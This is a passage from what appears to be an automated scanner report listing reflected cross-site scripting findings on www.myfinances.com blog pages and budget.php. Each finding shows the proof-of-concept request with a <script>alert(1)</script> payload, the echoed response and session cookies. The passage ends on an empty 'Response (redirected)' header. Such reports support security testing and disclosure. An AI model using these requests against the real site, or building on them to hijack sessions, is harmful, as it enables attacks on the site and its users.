GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:21 GMT Content-Length: 13823 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'"> ...[SNIP]...
4.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3227953.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:13 GMT Content-Length: 14027 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'"> ...[SNIP]...
4.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3227963.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:58 GMT Content-Length: 13645 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'"> ...[SNIP]...
4.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3241183.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:56 GMT Content-Length: 13681 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'"> ...[SNIP]...
4.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3241193.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:54 GMT Content-Length: 14125 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'"> ...[SNIP]...
4.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3299523.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:39 GMT Content-Length: 13301 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'"> ...[SNIP]...
4.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3299533.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:56 GMT Content-Length: 13628 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'"> ...[SNIP]...
4.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3299543.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:03 GMT Content-Length: 13601 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'"> ...[SNIP]...
4.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3299553.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:54 GMT Content-Length: 13663 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'"> ...[SNIP]...
4.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/budget.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:20 GMT Content-Length: 21653 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/ Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:41 GMT Content-Length: 19651 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/ Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
